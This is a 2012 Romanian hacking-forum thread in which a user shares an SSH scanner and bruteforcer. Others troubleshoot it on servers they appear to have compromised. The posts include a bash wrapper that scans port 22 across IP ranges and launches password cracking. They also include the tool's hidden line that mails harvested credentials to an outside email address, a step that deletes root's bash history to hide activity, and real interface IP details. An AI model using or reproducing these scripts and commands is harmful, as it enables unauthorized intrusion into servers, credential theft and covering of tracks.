caramea Posted June 30, 2012 Report Share Posted June 30, 2012 Aveti aici un scanner SSH mai nou: Download Scanner SSH + Bruteforcer v2 - 2012.zipParola: WTBoS2JGbFlWbnBpTWtaNVdWaENhR050T1hOWlVUMDk= 1 Link to comment Share on other sites More sharing options...
hades Posted June 30, 2012 Report Share Posted June 30, 2012 Mai du-te ma. Nu tu un log cu fisierul scanat, nu tu nimic. Link to comment Share on other sites More sharing options...
bc-vnt Posted June 30, 2012 Report Share Posted June 30, 2012 Link to comment Share on other sites More sharing options...
pukamvp Posted June 30, 2012 Report Share Posted June 30, 2012 hint pass? Link to comment Share on other sites More sharing options...
tm03ewn Posted June 30, 2012 Report Share Posted June 30, 2012 (edited) Hint1: Same shit de 3xHint2 : e prea usoara frateAm sa incerc scannerul cand ajung acasa ,sunt la un prieten momentan Edited June 30, 2012 by tm03ewn Link to comment Share on other sites More sharing options...
caramea Posted June 30, 2012 Author Report Share Posted June 30, 2012 @alecseu: Dupa ce ca e moca si e si de calitate mai ai si pretentii. Ce log, ce scanare cand e pe linux? Si in plus te-am obligat eu sa descarci? Eu zic sa iti vezi acolo de treaba ta. Link to comment Share on other sites More sharing options...
hades Posted June 30, 2012 Report Share Posted June 30, 2012 E bestial. Scuze ca m-am bagat in seama.cat vuln.log | sort|uniq|mail -s "ChannelHelp SSHv2" test@test.com &>/dev/null& Link to comment Share on other sites More sharing options...
koba Posted June 30, 2012 Report Share Posted June 30, 2012 De ce imi da asa eroare? Ce tre sa fac sa mearga?[wn] Scanning 62.203 for open ssh ips.cat: bios.txt: No such file or directory[sSH] Found 0 ip's[wn] Cracking started# DO NOT SHARE THIS FUCKING SHITrm: cannot remove `/root/.bash_history': Read-only file systemtouch: cannot touch `/root/.bash_history': Read-only file system Link to comment Share on other sites More sharing options...
caramea Posted June 30, 2012 Author Report Share Posted June 30, 2012 E bestial. Scuze ca m-am bagat in seama.cat vuln.log | sort|uniq|mail -s "ChannelHelp SSHv2" test@test.com &>/dev/null&Ai citit macar readme.txt? @koba ai pus corect placa de retea prin care iesi la net? Link to comment Share on other sites More sharing options...
hades Posted June 30, 2012 Report Share Posted June 30, 2012 @koba Ai uid0 pe sv? ;\@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca. Link to comment Share on other sites More sharing options...
koba Posted June 30, 2012 Report Share Posted June 30, 2012 (edited) @caramea , da.@alecseu ,sunt incepator in astea,stiu doar cateva comenzi si atat... Edited June 30, 2012 by koba Link to comment Share on other sites More sharing options...
caramea Posted June 30, 2012 Author Report Share Posted June 30, 2012 @koba Ai uid0 pe sv? ;\@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca.Dar nu ma intereseaza pe mine asta, dupa ce ca e mura in gura, mai are si defecte. Asa e cand postezi pe forumuri romanesti.@koba: Totusi nu cred ca ai pus corect placa de retea, da un ifconfig. Link to comment Share on other sites More sharing options...
koba Posted June 30, 2012 Report Share Posted June 30, 2012 Cred ca am pus corect ,mai am un scaner pe rootul asta si ala merge bine doar ca e incet..eth0 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04 inet addr:172.17.3.56 Bcast:172.17.3.255 Mask:255.255.255.0 inet6 addr: fe80::20d:b9ff:fe21:e004/64 Scope:Link UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 RX packets:132032845 errors:0 dropped:0 overruns:0 frame:0 TX packets:517955485 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3628271658 (3.3 GiB) TX bytes:3879094384 (3.6 GiB) Interrupt:10 Base address:0x8000eth0:1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:04 inet addr:172.17.3.49 Bcast:172.17.3.255 Mask:255.255.255.0 UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 Interrupt:10 Base address:0x8000eth1 Link encap:Ethernet HWaddr 00:0d:b9:21:e0:05 inet addr:192.168.1.1 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::20d:b9ff:fe21:e005/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:58575121 errors:0 dropped:0 overruns:0 frame:0 TX packets:76984193 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3597993480 (3.3 GiB) TX bytes:4094441184 (3.8 GiB) Interrupt:11 Base address:0xc000lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:54 errors:0 dropped:0 overruns:0 frame:0 TX packets:54 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:7832 (7.6 KiB) TX bytes:7832 (7.6 KiB) Link to comment Share on other sites More sharing options...
caramea Posted June 30, 2012 Author Report Share Posted June 30, 2012 Incearca si eth1. Link to comment Share on other sites More sharing options...
koba Posted June 30, 2012 Report Share Posted June 30, 2012 Incearca si eth1.am incercat, exact aceeasi eroare. Link to comment Share on other sites More sharing options...
koba Posted June 30, 2012 Report Share Posted June 30, 2012 @caramea am incercat pe backtrack, imi da asa eroare ..Found 1320 ipsCracking startedRecieved unhandled msg 4Recieved unhandled msg 4Recieved unhandled msg 4si dupa aia s'a oprit Link to comment Share on other sites More sharing options...
hades Posted June 30, 2012 Report Share Posted June 30, 2012 @caramea Tu i fi wn a.k.a puricel de pe undernet. Link to comment Share on other sites More sharing options...
Caracal Posted June 30, 2012 Report Share Posted June 30, 2012 @koba Ai uid0 pe sv? ;\@caramea: Nu. Nu am citit readme.txt. Multi nu o sa-l citeasca.Cum multi nu o sa citeasca nici ce fac scripturile alea p-acolo:cat vuln.log | mail -s "ChannelHelp Scan Result" [email]estifericit@gmail.com[/email]in fisierul "clean". Link to comment Share on other sites More sharing options...
caramea Posted June 30, 2012 Author Report Share Posted June 30, 2012 Cum multi nu o sa citeasca nici ce fac scripturile alea p-acolo:cat vuln.log | mail -s "ChannelHelp Scan Result" [email]estifericit@gmail.com[/email]in fisierul "clean".Nu e al meu, merci de observatie. Dar totusi mie nu imi salveaza in vuln.log nimic, doar le afiseaza in consola. Link to comment Share on other sites More sharing options...
Caracal Posted June 30, 2012 Report Share Posted June 30, 2012 Nu e al meu, merci de observatie. Dar totusi mie nu imi salveaza in vuln.log nimic, doar le afiseaza in consola.e comentata linia#echo "[SSH] Username: $(echo $line |cut -d ":" -f 1) Password: $(echo $line |cut -d ":" -f 2) IP: $(echo $line |cut -d ":" -f 3)" >>vuln.logdin eof. Poti sa stergi mailul ala, sa decomentezi linia si o sa iti faca si vuln.log Link to comment Share on other sites More sharing options...
tm03ewn Posted July 1, 2012 Report Share Posted July 1, 2012 Am o problema sa zic asa,am incercat scannerul pe 12+ servere [rooturi],toate aveau eth0 si le , unele aveau eth0 , eth1 dar primesc aceeasi eroare : tomcat@Caravella:/dev/shm/moloz> ./wn b 208.53 eth0 9 [SSH] LOADING ....####################################### ChannelHelp @ UNDERNET #### Powered by wn #### 2012 SSHv2 Bruteforcer #### Contact me at wnback@yahoo.com #######################################[wn] Scanning 208.53 for open ssh ips.cat: bios.txt: No such file or directory[SSH] Found 0 ip's[wn] Cracking started# DO NOT SHARE THIS FUCKING SHITrm: cannot lstat `/root/.bash_history': Permission deniedtouch: cannot touch `/root/.bash_history': Permission deniediar dupa ,se opreste:) La absolut toate rooturile am aceeasi eraoreany toughts? Link to comment Share on other sites More sharing options...
hades Posted July 2, 2012 Report Share Posted July 2, 2012 Pentru synscanul ala ai nevoie de eth0 / eth1. Inlocuieste class cu un pscan2/pscan.Modifica in wn linia cu "./class bla bla" in ./pscan2 $1 22Si modifici numele fisierului in care salveaza ip-urile din bios.txt in $1.pscan.22 Mult noroc. ;-) Link to comment Share on other sites More sharing options...
tm03ewn Posted July 2, 2012 Report Share Posted July 2, 2012 @alecseuaproape lafel [2 erori in + ] [SSH] LOADING ....####################################### ChannelHelp @ UNDERNET #### Powered by wn #### 2012 SSHv2 Bruteforcer #### Contact me at wnback@yahoo.com #######################################[wn] Scanning 66.5 for open ssh ips.usec: 1000000, burst packets 50damn dude, port numbers are in 1 .. 65535cat: bios.txt: No such file or directory[SSH] Found 0 ip's[wn] Cracking started# DO NOT SHARE THIS FUCKING SHITrm: cannot remove `/root/.bash_history': Permission deniedtouch: cannot touch `/root/.bash_history': Permission deniedam facut ce mi-ai zis tu.dar nimic PS : taote serverele pe care am incercat scannerul aveau ethode exemplu cel pe care il incerc acum : susan@firefly:/dev/shm/moloz/moloz$ ifconfigeth0 Link encap:Ethernet HWaddr 40:40:57:9E:32:F8 inet addr:208.78.102.27 Bcast:208.78.102.255 Mask:255.255.255.0 inet6 addr: fe80::4240:57ff:fe9e:32f8/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6429567 errors:0 dropped:0 overruns:0 frame:0 TX packets:4545783 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:691797149 (659.7 MiB) TX bytes:12823382673 (11.9 GiB)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:33255 errors:0 dropped:0 overruns:0 frame:0 TX packets:33255 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:2488755 (2.3 MiB) TX bytes:2488755 (2.3 MiB) Link to comment Share on other sites More sharing options...
hades Posted July 2, 2012 Report Share Posted July 2, 2012 Dude.Urca-ti un pscan2 in folderul cu scannerul.Apoi, creaza un fisier "a" (de exemplu).In fisierul ala 'a' dai c/p la asta:#!/bin/bashrm -rf bios.txt mfu.txt *.synecho "[wn] Scanning $1 for open ssh ips."./pscan2 $1 22cat $1.pscan.22 |sort -u | uniq > mfu.txtoopsnr2=`grep -c . mfu.txt`if [ -f mfu.txt ]; thenecho -e "[SSH] Found $oopsnr2 ip's"cp mfu.txt $1.synecho "[wn] Cracking started"./update 1500sleep 30if [ -f vuln.txt ]; thenecho -e "[SSH] Cleaning Results!"./cleanelserm -rf mfu.txt ipsfifichmod +x a pscan2./a plm.plmUita-te in fisierul clean ca trebuie sa decomentezi o linie si sa stergi un sendmail. Link to comment Share on other sites More sharing options...
pyth0n3 Posted July 2, 2012 Report Share Posted July 2, 2012 Daca scriptul ala de shell a fost scris de labari ce sa mai spun de executabilele compilate.Sunt compilate si fara sursa deoarece fac wrapping peste wrapping .Parca scriptul de shell a fost scris in assembly pentru o arhitectura specifica .Cat de inteligent poti sa fi sa prezici asemenea comenzi ratate precum "rm /root/.bash_history" si "touch /root/.bash_history" , adica e un standard POSIX sa stochezi comenzile intrun asemenea fisier ? .Si voi restul pe acolo rulati orice cacat fara sa va dati seama ce face.Faceti ce stiti sa faceti lasati balta cacaturile daca nu sunteti in stare. Link to comment Share on other sites More sharing options...
